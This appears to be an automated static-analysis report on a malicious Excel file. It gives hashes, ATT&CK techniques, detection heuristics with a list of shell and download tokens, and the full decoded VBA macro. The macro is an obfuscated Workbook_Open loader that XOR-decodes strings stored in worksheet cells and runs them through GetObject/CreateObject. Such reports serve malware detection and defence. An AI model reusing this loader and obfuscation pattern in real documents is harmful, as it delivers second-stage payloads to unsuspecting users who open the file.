Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 00e77355e35927bb…

MALICIOUS

Office (OLE) / .XLS

40.5 KB Created: 2023-05-16 20:24:32 Authoring application: Microsoft Excel First seen: 2023-05-19
MD5: 6b646f78ecaa120f33f8be8867d43d2a SHA-1: 6664cd0853992d7c4361c04930abb9ab59ce65f2 SHA-256: 00e77355e35927bbdca2fdebe7c8251af91d1ab90a5cd58957fd7587ef4fd71a
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Excel file containing a Workbook_Open VBA macro. This macro is designed to execute obfuscated code that retrieves values from specific cells in the 'q8719' sheet, likely to construct a command or URL. The GetObject and CreateObject calls, along with the Workbook_Open auto-execution, strongly indicate an attempt to download and run a second-stage payload, which is a common technique for malware delivery.

Heuristics 5

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
                    GetObject(Sought).CreateObject(Danger).Run RetuRning, 0
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
                    GetObject(Sought).CreateObject(Danger).Run RetuRning, 0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4458 bytes
SHA-256: 0514e10258f8a55f15d89eb9cbf4cd2839f9a62b29699a000dd0f3fa855d4f0d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private EngagE As String






                                        Private Discipline As String
Private PhotoshoP As String
Sub Workbook_Open()
GoTo EvaluatEd







          




                                                Dim Palestinian As String







               Palestinian = InputBox("first number")
Dim RequiRing As String
RequiRing = InputBox("last number")








                MsgBox Palestinian
MsgBox RequiRing








EvaluatEd:
If Palestinian = "" Then





              TableT





           





                                                                    End If






                  End Sub
Private Sub TableT()
Dim Sought As String, RetuRning As String, Danger As String








                   GoTo RetuRning
Margaret:







                GetObject(Sought).CreateObject(Danger).Run RetuRning, 0
Exit Sub







Nepal:
Sought = Intent(EngagE): RetuRning = Intent(Discipline): Danger = Intent(PhotoshoP)






                                                GoTo Margaret
RetuRning:





                                                                




                EngagE = Sheets("q8719").Range("G192").Value: Discipline = Sheets("q8719").Range("H169").Value: PhotoshoP = Sheets("q8719").Range("E197").Value
GoTo Nepal
Dim Palestinian As String
Palestinian = InputBox("")
End Sub





               Private Function Charm(ByVal Imports As String) As Variant
Dim Justin() As Byte, i As Long, Camel As Integer, EvaluatEd As Integer








            EvaluatEd = Len(Imports) / 2: i = 0: ReDim Justin(0 To EvaluatEd) As Byte





          




Palestinian:
If i < Len(Imports) Then
Camel = Camel + 1
Justin(Camel - 1) = Chr(14 + (12 * 2)) & "H" & Mid(Imports, i + 1, 2)
i = i + 2
GoTo Palestinian
Else
GoTo RequiRing
End If
RequiRing:
Charm = Justin
End Function





               





          Private Function Intent(ByVal InterventIon As String) As Variant






                Dim DeemeD As Long: DeemeD = 0: Dim Promoting() As Byte: Dim SuSpenSion() As Byte, Justin As String, Camel As Integer





           SuSpenSion = "s79f158f83"
GoTo HouseHolds
Fewer:
Dim RequiRing As String





                                                        RequiRing = InputBox("check result")





                                                            MsgBox RequiRing





Genetics:
If DeemeD < UBound(Promoting) Then
Camel = DeemeD Mod (10)
GoTo Sought
RetuRning:








                                        





                                                            Justin = Justin & Chr(Promoting(DeemeD))






                                                                            DeemeD = DeemeD + 1






                                                                    GoTo Genetics







                                                Else






                                                    GoTo Slave
End If





Imports:





                                                    Dim Palestinian As String
Palestinian = InputBox("enter your value")
Slave:








                  Intent = Justin
Exit Function
HouseHolds:






                                                                    Promoting = Charm(InterventIon)
GoTo Genetics
Sought:






                                                                Promoting(DeemeD) = Abs(Promoting(DeemeD) Xor SuSpenSion(Camel * 2))








                





                                                        GoTo RetuRning
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True